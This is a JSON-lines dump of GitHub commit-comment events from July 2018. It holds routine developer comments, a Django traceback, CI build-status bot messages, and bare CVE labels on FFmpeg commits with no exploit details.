{"id":"7926249048","type":"CommitCommentEvent","actor":{"login":"ekhanunimelb"},"repo":{"name":"UoM-ResPlat-DevOps/uom-cloud-dashboard"},"payload":{"comment":{"id":29615450,"position":null,"line":null,"path":null,"commit_id":"b6d9d2b43987f0239b6d0879c7ae88024d08ecf6","created_at":"2018-07-06T00:49:14Z","updated_at":"2018-07-06T00:49:14Z","author_association":"COLLABORATOR","body":"Traceback:\r\n\r\n```\r\nEnvironment:\r\n\r\n\r\nRequest Method: GET\r\nRequest URL: http://<hostname>/allocation/requests/reject_request/1/\r\n\r\nDjango Version: 1.8.19\r\nPython Version: 2.7.15\r\nInstalled Applications:\r\n['rest_framework',\r\n 'openstack_dashboard.dashboards.project',\r\n 'openstack_dashboard.dashboards.admin',\r\n 'openstack_dashboard.dashboards.settings',\r\n 'nectar_dashboard.reset_password',\r\n 'nectar_dashboard.rcallocation',\r\n 'nectar_dashboard.rcallocation.allocation',\r\n 'nectar_dashboard.rcallocation.allocation_approved',\r\n 'nectar_dashboard.rcallocation.request',\r\n 'nectar_dashboard.rcallocation.user_allocations',\r\n 'nectar_dashboard.project_members',\r\n 'openstack_dashboard',\r\n 'django.contrib.contenttypes',\r\n 'django.contrib.auth',\r\n 'django.contrib.sessions',\r\n 'django.contrib.messages',\r\n 'django.contrib.staticfiles',\r\n 'django.contrib.humanize',\r\n 'django_pyscss',\r\n 'openstack_dashboard.django_pyscss_fix',\r\n 'compressor',\r\n 'horizon',\r\n 'openstack_auth']\r\nInstalled Middleware:\r\n('django.middleware.common.CommonMiddleware',\r\n 'django.middleware.csrf.CsrfViewMiddleware',\r\n 'django.contrib.sessions.middleware.SessionMiddleware',\r\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\r\n 'horizon.middleware.OperationLogMiddleware',\r\n 'django.contrib.messages.middleware.MessageMiddleware',\r\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\r\n 'horizon.middleware.HorizonMiddleware',\r\n 'horizon.themes.ThemeMiddleware',\r\n 'django.middleware.locale.LocaleMiddleware',\r\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\r\n 'openstack_dashboard.contrib.developer.profiler.middleware.ProfilerClientMiddleware',\r\n 'openstack_dashboard.contrib.developer.profiler.middleware.ProfilerMiddleware')\r\n\r\n\r\nTraceback:\r\nFile \"/opt/horizon/lib/python2.7/site-packages/django/core/handlers/base.py\" in get_response\r\n  132.                     response = wrapped_callback(request, *callback_args, **callback_kwargs)\r\nFile \"/opt/horizon/lib/python2.7/site-packages/openstack_dashboard/wsgi/../../horizon/decorators.py\" in dec\r\n  52.             return view_func(request, *args, **kwargs)\r\nFile \"/opt/horizon/lib/python2.7/site-packages/openstack_dashboard/wsgi/../../horizon/decorators.py\" in dec\r\n  36.         return view_func(request, *args, **kwargs)\r\nFile \"/opt/horizon/lib/python2.7/site-packages/openstack_dashboard/wsgi/../../horizon/decorators.py\" in dec\r\n  52.             return view_func(request, *args, **kwargs)\r\nFile \"/opt/horizon/lib/python2.7/site-packages/openstack_dashboard/wsgi/../../horizon/decorators.py\" in dec\r\n  36.         return view_func(request, *args, **kwargs)\r\nFile \"/opt/horizon/lib/python2.7/site-packages/openstack_dashboard/wsgi/../../horizon/decorators.py\" in dec\r\n  113.         return view_func(request, *args, **kwargs)\r\nFile \"/opt/horizon/lib/python2.7/site-packages/django/views/generic/base.py\" in view\r\n  71.             return self.dispatch(request, *args, **kwargs)\r\nFile \"/opt/horizon/lib/python2.7/site-packages/django/views/generic/base.py\" in dispatch\r\n  89.         return handler(request, *args, **kwargs)\r\nFile \"/opt/uom-cloud-dashboard/nectar_dashboard/rcallocation/views.py\" in get\r\n  430.         kwargs['quota_formsets'] = self.get_quota_formsets()\r\nFile \"/opt/uom-cloud-dashboard/nectar_dashboard/rcallocation/views.py\" in get_quota_formsets\r\n  281.                 extra=len(initial))\r\nFile \"/opt/horizon/lib/python2.7/site-packages/django/forms/models.py\" in inlineformset_factory\r\n  1039.     FormSet = modelformset_factory(model, **kwargs)\r\nFile \"/opt/horizon/lib/python2.7/site-packages/django/forms/models.py\" in modelformset_factory\r\n  827.             \"Calling modelformset_factory without defining 'fields' or \"\r\n\r\nException Type: ImproperlyConfigured at /allocation/requests/reject_request/1/\r\nException Value: Calling modelformset_factory without defining 'fields' or 'exclude' explicitly is prohibited.\r\n```"}},"created_at":"2018-07-06T00:49:14Z"}
{"id":"7926250246","type":"CommitCommentEvent","actor":{"login":"zhenchengcode"},"repo":{"name":"zhenchengcode/annotation-UI"},"payload":{"comment":{"id":29615452,"position":null,"line":null,"path":null,"commit_id":"3abebb92f8cb62e59d09f6a18fb65a64c71b3dbd","created_at":"2018-07-06T00:49:48Z","updated_at":"2018-07-06T00:49:48Z","author_association":"OWNER","body":"Refer to this link:\r\nhttps://www.w3schools.com/cssref/tryit.asp?filename=trycss_class-clear"}},"created_at":"2018-07-06T00:49:48Z"}
{"id":"7926253148","type":"CommitCommentEvent","actor":{"login":"bd82"},"repo":{"name":"jhipster/jhipster-core"},"payload":{"comment":{"id":29615456,"position":6,"line":69,"path":"package.json","commit_id":"9f9c4c19d19cee3c5f9ceca7780536da439eef4b","created_at":"2018-07-06T00:51:04Z","updated_at":"2018-07-06T00:51:04Z","author_association":"CONTRIBUTOR","body":"why is not 6 not supported?\r\nDoes jhipster-core depend on some module that does not work under node6?"}},"created_at":"2018-07-06T00:51:04Z"}
{"id":"7926254123","type":"CommitCommentEvent","actor":{"login":"mser7"},"repo":{"name":"FossilsArcheologyRevival/FossilsArcheologyRevival"},"payload":{"comment":{"id":29615460,"position":null,"line":null,"path":null,"commit_id":"14050a358a744e33fc203d67ba32777014769c22","created_at":"2018-07-06T00:51:30Z","updated_at":"2018-07-06T00:51:30Z","author_association":"NONE","body":"W"}},"created_at":"2018-07-06T00:51:30Z"}
{"id":"7926255095","type":"CommitCommentEvent","actor":{"login":"165094"},"repo":{"name":"shiyunlai/senior-developer-design"},"payload":{"comment":{"id":29615464,"position":null,"line":null,"path":null,"commit_id":"a2a3ae03b999478b1b3b58164d7ad5c61510923f","created_at":"2018-07-06T00:51:55Z","updated_at":"2018-07-06T00:51:55Z","author_association":"COLLABORATOR","body":"删除投放说明"}},"created_at":"2018-07-06T00:51:55Z"}
{"id":"7926266093","type":"CommitCommentEvent","actor":{"login":"fkleuver"},"repo":{"name":"fkleuver/experiment"},"payload":{"comment":{"id":29615480,"position":18,"line":18,"path":"src/runtime/resources/array-repeater.ts","commit_id":"3560478969b32108dd9e6bccda6191b6ae3da229","created_at":"2018-07-06T00:56:39Z","updated_at":"2018-07-06T00:56:39Z","author_association":"OWNER","body":"Immediate is what calls `queueMicroTask` indirectly (see line 75). Then `flushMicroTaskQueue` will call the batched subscription notification."}},"created_at":"2018-07-06T00:56:39Z"}
{"id":"7926268000","type":"CommitCommentEvent","actor":{"login":"5antoshernandez"},"repo":{"name":"5antoshernandez/5antoshernandez"},"payload":{"comment":{"id":29615481,"position":null,"line":null,"path":null,"commit_id":"a41c232d671cc7dfd41ddd0f6782518a99030865","created_at":"2018-07-06T00:57:26Z","updated_at":"2018-07-06T00:57:26Z","author_association":"OWNER","body":"good commit"}},"created_at":"2018-07-06T00:57:26Z"}
{"id":"7926272459","type":"CommitCommentEvent","actor":{"login":"allen65535"},"repo":{"name":"allen65535/PTTLibrary"},"payload":{"comment":{"id":29615483,"position":null,"line":null,"path":null,"commit_id":"bb3bca9f6d57aae3f3a5bf6ba285e3b4665a9344","created_at":"2018-07-06T00:59:26Z","updated_at":"2018-07-06T00:59:26Z","author_association":"OWNER","body":"機器人逃脫"}},"created_at":"2018-07-06T00:59:26Z"}
{"id":"7926272768","type":"CommitCommentEvent","actor":{"login":"natecrow"},"repo":{"name":"natecrow/my-destinations"},"payload":{"comment":{"id":29615484,"position":null,"line":null,"path":null,"commit_id":"92d45f748e23f4371d13dc1823810dc7945aeb48","created_at":"2018-07-06T00:59:34Z","updated_at":"2018-07-06T00:59:34Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [View a destination list](https://trello.com/c/fcoC0bJt/8-view-a-destination-list)"}},"created_at":"2018-07-06T00:59:34Z"}
{"id":"7926276682","type":"CommitCommentEvent","actor":{"login":"fkleuver"},"repo":{"name":"fkleuver/experiment"},"payload":{"comment":{"id":29615497,"position":18,"line":18,"path":"src/runtime/resources/array-repeater.ts","commit_id":"3560478969b32108dd9e6bccda6191b6ae3da229","created_at":"2018-07-06T01:01:06Z","updated_at":"2018-07-06T01:01:06Z","author_association":"OWNER","body":"Whoops, I misunderstood your question. Actually it's not working as intended yet in this version, but it will in my next commit"}},"created_at":"2018-07-06T01:01:06Z"}
{"id":"7926283997","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29615505,"position":null,"line":null,"path":null,"commit_id":"913a209ec380d8cc6ed180f9a1ca1b19bf1decf0","created_at":"2018-07-06T01:04:17Z","updated_at":"2018-07-06T01:04:17Z","author_association":"COLLABORATOR","body":"✅ [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/74/display/redirect) (on internal Jenkins) succeeded\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/74//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/913a209ec380d8cc6ed180f9a1ca1b19bf1decf0/74/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/913a209ec380d8cc6ed180f9a1ca1b19bf1decf0/74/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/913a209ec380d8cc6ed180f9a1ca1b19bf1decf0/74/jenkins-results/generator-diff/index.html) (please review changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/xcode10/913a209ec380d8cc6ed180f9a1ca1b19bf1decf0/74/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-06T01:04:17Z"}
{"id":"7926286618","type":"CommitCommentEvent","actor":{"login":"hacker1024"},"repo":{"name":"LineageOS/android_bionic"},"payload":{"comment":{"id":29615509,"position":null,"line":null,"path":null,"commit_id":"8325732f085bb54f38c0fa245319cdc608861beb","created_at":"2018-07-06T01:05:28Z","updated_at":"2018-07-06T01:05:28Z","author_association":"NONE","body":"This causes an error for me.\r\nI'm building for natrium.\r\n```\r\nFAILED: /mnt/Data/AndroidBuilds/RR/out/soong/build.ninja \r\n/mnt/Data/AndroidBuilds/RR/out/soong/.bootstrap/bin/soong_build  -t -b /mnt/Data/AndroidBuilds/RR/out/soong -d /mnt/Data/AndroidBuilds/RR/out/soong/build.ninja.d -o /mnt/Data/AndroidBuilds/RR/out/soong/build.ninja Android.bp\r\nerror: bionic/libc/Android.bp:1142:20: unrecognized property \"arch.arm64.kryo300\"\r\n```"}},"created_at":"2018-07-06T01:05:28Z"}
{"id":"7926287053","type":"CommitCommentEvent","actor":{"login":"Juliavra"},"repo":{"name":"Juliavra/CursoIngresoJS"},"payload":{"comment":{"id":29615510,"position":null,"line":null,"path":null,"commit_id":"e3c7788eb9cea0f4fc88a0be8eee7c197cdba5b7","created_at":"2018-07-06T01:05:39Z","updated_at":"2018-07-06T01:05:39Z","author_association":"OWNER","body":"Se definen las variables dentro de cada función o al comienzo (Local vs Global)???"}},"created_at":"2018-07-06T01:05:39Z"}
{"id":"7926297496","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29615539,"position":null,"line":null,"path":null,"commit_id":"e51f17bcb28fe94c8e1b9a63bc509cc4ed24855f","created_at":"2018-07-06T01:10:31Z","updated_at":"2018-07-06T01:10:31Z","author_association":"COLLABORATOR","body":"✅ [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/75/display/redirect) (on internal Jenkins) succeeded\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/75//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/e51f17bcb28fe94c8e1b9a63bc509cc4ed24855f/75/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/e51f17bcb28fe94c8e1b9a63bc509cc4ed24855f/75/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/e51f17bcb28fe94c8e1b9a63bc509cc4ed24855f/75/jenkins-results/generator-diff/index.html) (please review changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/xcode10/e51f17bcb28fe94c8e1b9a63bc509cc4ed24855f/75/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-06T01:10:31Z"}
{"id":"7926299877","type":"CommitCommentEvent","actor":{"login":"thuanpv"},"repo":{"name":"FFmpeg/FFmpeg"},"payload":{"comment":{"id":29615547,"position":null,"line":null,"path":null,"commit_id":"95556e27e2c1d56d9e18f5db34d6f756f3011148","created_at":"2018-07-06T01:11:34Z","updated_at":"2018-07-06T01:11:34Z","author_association":"NONE","body":"This is CVE-2018-13300"}},"created_at":"2018-07-06T01:11:34Z"}
{"id":"7926301670","type":"CommitCommentEvent","actor":{"login":"thuanpv"},"repo":{"name":"FFmpeg/FFmpeg"},"payload":{"comment":{"id":29615553,"position":null,"line":null,"path":null,"commit_id":"2aa9047486dbff12d9e040f917e5f799ed2fd78b","created_at":"2018-07-06T01:12:22Z","updated_at":"2018-07-06T01:12:22Z","author_association":"NONE","body":"This is CVE-2018-13301"}},"created_at":"2018-07-06T01:12:22Z"}
{"id":"7926302771","type":"CommitCommentEvent","actor":{"login":"zhaoyahui"},"repo":{"name":"zyhzhaoyahui/cloud-config"},"payload":{"comment":{"id":29615557,"position":null,"line":null,"path":null,"commit_id":"afdb4b5cc97e5d220c15fe02c078b395a52a5b9b","created_at":"2018-07-06T01:12:52Z","updated_at":"2018-07-06T01:12:52Z","author_association":"NONE","body":"ttttttttt"}},"created_at":"2018-07-06T01:12:52Z"}
{"id":"7926303739","type":"CommitCommentEvent","actor":{"login":"thuanpv"},"repo":{"name":"FFmpeg/FFmpeg"},"payload":{"comment":{"id":29615560,"position":null,"line":null,"path":null,"commit_id":"ed22dc22216f74c75ee7901f82649e1ff725ba50","created_at":"2018-07-06T01:13:15Z","updated_at":"2018-07-06T01:13:15Z","author_association":"NONE","body":"This is CVE-2018-13302"}},"created_at":"2018-07-06T01:13:15Z"}
{"id":"7926305108","type":"CommitCommentEvent","actor":{"login":"thuanpv"},"repo":{"name":"FFmpeg/FFmpeg"},"payload":{"comment":{"id":29615562,"position":null,"line":null,"path":null,"commit_id":"00e8181bd97c834fe60751b0c511d4bb97875f78","created_at":"2018-07-06T01:13:52Z","updated_at":"2018-07-06T01:13:52Z","author_association":"NONE","body":"This is CVE-2018-13303"}},"created_at":"2018-07-06T01:13:52Z"}
{"id":"7926306770","type":"CommitCommentEvent","actor":{"login":"thuanpv"},"repo":{"name":"FFmpeg/FFmpeg"},"payload":{"comment":{"id":29615566,"position":null,"line":null,"path":null,"commit_id":"bd27a9364ca274ca97f1df6d984e88a0700fb235","created_at":"2018-07-06T01:14:36Z","updated_at":"2018-07-06T01:14:36Z","author_association":"NONE","body":"This is CVE-2018-13304"}},"created_at":"2018-07-06T01:14:36Z"}
{"id":"7926308360","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29615573,"position":null,"line":null,"path":null,"commit_id":"7b26f5086bfb072b9b1ba9a281d1a7b661d045c9","created_at":"2018-07-06T01:15:14Z","updated_at":"2018-07-06T01:15:14Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/wiki-by-default-category-should-take-you-to-first-post/91529/3\n"}},"created_at":"2018-07-06T01:15:14Z"}
{"id":"7926309071","type":"CommitCommentEvent","actor":{"login":"ddt-sawa"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29615579,"position":null,"line":null,"path":null,"commit_id":"729cc5030aa7eb762fbebaaa1c8e3f172abb2c74","created_at":"2018-07-06T01:15:33Z","updated_at":"2018-07-06T01:15:33Z","author_association":"OWNER","body":"while文で書いていたループ文は極力for文にするようご指摘をいただいたため、以降のループ文は断りがなくとも直しているものとさせていただきます。"}},"created_at":"2018-07-06T01:15:33Z"}
{"id":"7926309115","type":"CommitCommentEvent","actor":{"login":"thuanpv"},"repo":{"name":"FFmpeg/FFmpeg"},"payload":{"comment":{"id":29615580,"position":null,"line":null,"path":null,"commit_id":"d08d4a8c7387e758d439b0592782e4cfa2b4d6a4","created_at":"2018-07-06T01:15:34Z","updated_at":"2018-07-06T01:15:34Z","author_association":"NONE","body":"This is CVE-2018-13305"}},"created_at":"2018-07-06T01:15:34Z"}
{"id":"7926316308","type":"CommitCommentEvent","actor":{"login":"steviebanko"},"repo":{"name":"steviebanko/Meteorite"},"payload":{"comment":{"id":29615608,"position":20,"line":357,"path":"index.html","commit_id":"ae2d097ee30bfd7be8bd8e959d0acde52cd81f86","created_at":"2018-07-06T01:18:43Z","updated_at":"2018-07-06T01:18:43Z","author_association":"OWNER","body":"textarea element is used for message and rows=\"5\" takes up 5 rows automatically for the message"}},"created_at":"2018-07-06T01:18:43Z"}
{"id":"7926318613","type":"CommitCommentEvent","actor":{"login":"steviebanko"},"repo":{"name":"steviebanko/Meteorite"},"payload":{"comment":{"id":29615610,"position":10,"line":364,"path":"index.html","commit_id":"3253beb9b407ca1f752f2ec6de9fcefff7e49b66","created_at":"2018-07-06T01:19:45Z","updated_at":"2018-07-06T01:19:45Z","author_association":"OWNER","body":"form used col-9, now button uses col-3 and align self center within the container next to the form"}},"created_at":"2018-07-06T01:19:45Z"}
{"id":"7926319548","type":"CommitCommentEvent","actor":{"login":"ldl5007"},"repo":{"name":"ldl5007/FBMFilter"},"payload":{"comment":{"id":29615611,"position":null,"line":null,"path":null,"commit_id":"a391cc6be64453569861d1b2e59ff3b5e081ea4e","created_at":"2018-07-06T01:20:08Z","updated_at":"2018-07-06T01:20:08Z","author_association":"OWNER","body":"fixed #3 "}},"created_at":"2018-07-06T01:20:08Z"}
{"id":"7926320552","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29615613,"position":null,"line":null,"path":null,"commit_id":"f5f94e26c8f9721d2896e2f7cde0cecc0dd34f18","created_at":"2018-07-06T01:20:34Z","updated_at":"2018-07-06T01:20:34Z","author_association":"COLLABORATOR","body":"![black guy think](https://user-images.githubusercontent.com/163977/42355097-7ac529da-8088-11e8-9752-04e31f4d16d2.jpg)\r\n"}},"created_at":"2018-07-06T01:20:34Z"}
{"id":"7926340258","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29615648,"position":28,"line":24,"path":"ticketing/views/UserStore.py","commit_id":"2fa00ff41843ae64e5d8905ace8a64b66733afc1","created_at":"2018-07-06T01:28:50Z","updated_at":"2018-07-06T01:28:50Z","author_association":"COLLABORATOR","body":"'users'"}},"created_at":"2018-07-06T01:28:50Z"}
{"id":"7926340726","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29615651,"position":14,"line":16,"path":"ticketing/views/UserStore.py","commit_id":"2fa00ff41843ae64e5d8905ace8a64b66733afc1","created_at":"2018-07-06T01:29:02Z","updated_at":"2018-07-06T01:29:02Z","author_association":"COLLABORATOR","body":"'users'"}},"created_at":"2018-07-06T01:29:02Z"}
{"id":"7926341793","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29615653,"position":14,"line":16,"path":"ticketing/views/UserStore.py","commit_id":"2fa00ff41843ae64e5d8905ace8a64b66733afc1","created_at":"2018-07-06T01:29:28Z","updated_at":"2018-07-06T01:29:28Z","author_association":"COLLABORATOR","body":"should insert_data be returning a row? I think it should be acting like a void function, right?"}},"created_at":"2018-07-06T01:29:28Z"}
{"id":"7926341987","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29615654,"position":null,"line":null,"path":null,"commit_id":"9184c0e5782e4334084a7889a98f34b9ab45954e","created_at":"2018-07-06T01:29:32Z","updated_at":"2018-07-06T01:29:32Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 494](https://ci.hashicorp.engineering/viewLog.html?buildId=101535&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-06T01:29:32Z"}
{"id":"7926342632","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29615655,"position":null,"line":null,"path":null,"commit_id":"9184c0e5782e4334084a7889a98f34b9ab45954e","created_at":"2018-07-06T01:29:49Z","updated_at":"2018-07-06T01:29:49Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 494](https://ci.hashicorp.engineering/viewLog.html?buildId=101535&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:16"}},"created_at":"2018-07-06T01:29:49Z"}
{"id":"7926347225","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29615668,"position":30,"line":23,"path":"ticketing/views/SignUp.py","commit_id":"2fa00ff41843ae64e5d8905ace8a64b66733afc1","created_at":"2018-07-06T01:31:41Z","updated_at":"2018-07-06T01:31:41Z","author_association":"COLLABORATOR","body":"this should do a redirect(url_for('Dashboard')) so that you arent going back to the sign up page when a user successfully signs up. \r\n\r\nin the if statement, at the end of the if return redirect(url_for('Dashboard'))\r\nif the if condition is not true, then return the signup html page"}},"created_at":"2018-07-06T01:31:41Z"}
{"id":"7926349268","type":"CommitCommentEvent","actor":{"login":"zah"},"repo":{"name":"status-im/nim-eth-p2p"},"payload":{"comment":{"id":29615674,"position":95,"line":317,"path":"ethp2p/rlpx.nim","commit_id":"a6b14dcd0bca368939c88f1fed574e6b8c78e776","created_at":"2018-07-06T01:32:29Z","updated_at":"2018-07-06T01:32:29Z","author_association":"MEMBER","body":"OK, here are the new semantics for `nextMsg`.\r\n\r\n`nextMsg` returns only after the handler of the designated message has been executed (so you can count on the side effects introduced in the handler to be fully carried out). If there are multiple outstanding calls to `nextMsg` they all complete together."}},"created_at":"2018-07-06T01:32:29Z"}
{"id":"7926350597","type":"CommitCommentEvent","actor":{"login":"wdconinc"},"repo":{"name":"JeffersonLab/remoll"},"payload":{"comment":{"id":29615676,"position":null,"line":null,"path":null,"commit_id":"f1762734561967e689b1dfbea99971731c2d833f","created_at":"2018-07-06T01:33:04Z","updated_at":"2018-07-06T01:33:04Z","author_association":"MEMBER","body":"You shouldn't have to set both optical photons AND low energy neutrals, though. Anyway, glad it works."}},"created_at":"2018-07-06T01:33:04Z"}
{"id":"7926350671","type":"CommitCommentEvent","actor":{"login":"k2seok"},"repo":{"name":"COMAKI/maki0705"},"payload":{"comment":{"id":29615677,"position":6,"line":8,"path":".gitignore","commit_id":"21d48a0496abbaacf9736d9ce9d2e1c2806e5a9f","created_at":"2018-07-06T01:33:06Z","updated_at":"2018-07-06T01:33:06Z","author_association":"CONTRIBUTOR","body":"적용되지않음"}},"created_at":"2018-07-06T01:33:06Z"}
{"id":"7926362729","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29615692,"position":null,"line":null,"path":null,"commit_id":"3a7c2c8cbc926ccc1b1356772ab0df267532f123","created_at":"2018-07-06T01:38:09Z","updated_at":"2018-07-06T01:38:09Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2932 of 2932 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3a7c2c8cbc926ccc1b1356772ab0df267532f123-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3a7c2c8cbc926ccc1b1356772ab0df267532f123-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-06T01:38:09Z"}
{"id":"7926377421","type":"CommitCommentEvent","actor":{"login":"IkumaSaito"},"repo":{"name":"IkumaSaito/hackathon"},"payload":{"comment":{"id":29615717,"position":null,"line":null,"path":null,"commit_id":"b054524300b6e7aefbd00a6152a79e3852c94be3","created_at":"2018-07-06T01:44:13Z","updated_at":"2018-07-06T01:44:13Z","author_association":"OWNER","body":"タイムライン出来ました。"}},"created_at":"2018-07-06T01:44:13Z"}
{"id":"7926384473","type":"CommitCommentEvent","actor":{"login":"slimlime"},"repo":{"name":"rgaiacs/swc-sql-novice-survey"},"payload":{"comment":{"id":29615726,"position":null,"line":null,"path":null,"commit_id":"1b7639df672a536a9e241ffe464f57dd201cd8d8","created_at":"2018-07-06T01:47:05Z","updated_at":"2018-07-06T01:47:05Z","author_association":"NONE","body":"? Is this related to the code. Appears to be just css web styling and not sure if intended to change a bootstrap.css standard file (hacky?)"}},"created_at":"2018-07-06T01:47:05Z"}
{"id":"7926385048","type":"CommitCommentEvent","actor":{"login":"bjeanes"},"repo":{"name":"boazsegev/iodine"},"payload":{"comment":{"id":29615727,"position":null,"line":null,"path":null,"commit_id":"f9cfa04ba4d110713f75ae1721e8e968bdc84999","created_at":"2018-07-06T01:47:21Z","updated_at":"2018-07-06T01:47:21Z","author_association":"CONTRIBUTOR","body":"🎉"}},"created_at":"2018-07-06T01:47:21Z"}
{"id":"7926386285","type":"CommitCommentEvent","actor":{"login":"JerryTsang"},"repo":{"name":"JerryTsang/android_kernel_sharp_msm8974"},"payload":{"comment":{"id":29615731,"position":null,"line":null,"path":null,"commit_id":"c2ba89c6b256cc21ae077888e3248121a5789cb3","created_at":"2018-07-06T01:47:52Z","updated_at":"2018-07-06T01:47:52Z","author_association":"OWNER","body":"yes"}},"created_at":"2018-07-06T01:47:52Z"}
{"id":"7926394741","type":"CommitCommentEvent","actor":{"login":"chunliu"},"repo":{"name":"chunliu/typescript-react-hot-reload"},"payload":{"comment":{"id":29615747,"position":null,"line":null,"path":null,"commit_id":"1143370d11a847b314f7f6d4d479de384071900f","created_at":"2018-07-06T01:51:10Z","updated_at":"2018-07-06T01:51:10Z","author_association":"OWNER","body":"#4 "}},"created_at":"2018-07-06T01:51:10Z"}
{"id":"7926395835","type":"CommitCommentEvent","actor":{"login":"aleto44"},"repo":{"name":"aleto44/Survive"},"payload":{"comment":{"id":29615751,"position":null,"line":null,"path":null,"commit_id":"e686dcf517c2ecb9cda5dcf97deaac266ced08b9","created_at":"2018-07-06T01:51:36Z","updated_at":"2018-07-06T01:51:36Z","author_association":"OWNER","body":"Will run the current game without source files"}},"created_at":"2018-07-06T01:51:36Z"}
{"id":"7926398867","type":"CommitCommentEvent","actor":{"login":"chaitanya198"},"repo":{"name":"chaitanya198/test2"},"payload":{"comment":{"id":29615759,"position":12,"line":11,"path":"src/main/java/com/helloworld/test/TestServlet.java","commit_id":"c83f7b16f02d651ca32f67990e0c775cbaf9852b","created_at":"2018-07-06T01:52:46Z","updated_at":"2018-07-06T01:52:46Z","author_association":"OWNER","body":"Dude this is a good code."}},"created_at":"2018-07-06T01:52:46Z"}
{"id":"7926399341","type":"CommitCommentEvent","actor":{"login":"chaitanya198"},"repo":{"name":"chaitanya198/test2"},"payload":{"comment":{"id":29615760,"position":12,"line":11,"path":"src/main/java/com/helloworld/test/TestServlet.java","commit_id":"c83f7b16f02d651ca32f67990e0c775cbaf9852b","created_at":"2018-07-06T01:52:58Z","updated_at":"2018-07-06T01:52:58Z","author_association":"OWNER","body":"ok thx\r\n"}},"created_at":"2018-07-06T01:52:58Z"}
{"id":"7926400384","type":"CommitCommentEvent","actor":{"login":"Tribal1012"},"repo":{"name":"Tribal1012/mipsHex"},"payload":{"comment":{"id":29615763,"position":6,"line":19,"path":"mipsHex/asm_type/mips_asm_store.py","commit_id":"0da76ec7238c56c2509e9bba0e42f297b757ae50","created_at":"2018-07-06T01:53:25Z","updated_at":"2018-07-06T01:53:25Z","author_association":"OWNER","body":"1. rename from check_var_naming to convert_var_naming.\r\n2. process convert_var_naming according to new check_var_naming.\r\ne.g) if asmutils.check_var_naming(c_opr2): c_opr2 = asmutils.convert_var_naming(c_opr2)\r\n3. also applies to line 26"}},"created_at":"2018-07-06T01:53:25Z"}
{"id":"7926404008","type":"CommitCommentEvent","actor":{"login":"myMiracle18"},"repo":{"name":"myMiracle18/datasciencecoursera"},"payload":{"comment":{"id":29615769,"position":null,"line":null,"path":null,"commit_id":"3070fcf8521d9232840458484d15bd957ff8b12c","created_at":"2018-07-06T01:54:46Z","updated_at":"2018-07-06T01:54:46Z","author_association":"OWNER","body":"## This is a markdown file"}},"created_at":"2018-07-06T01:54:46Z"}
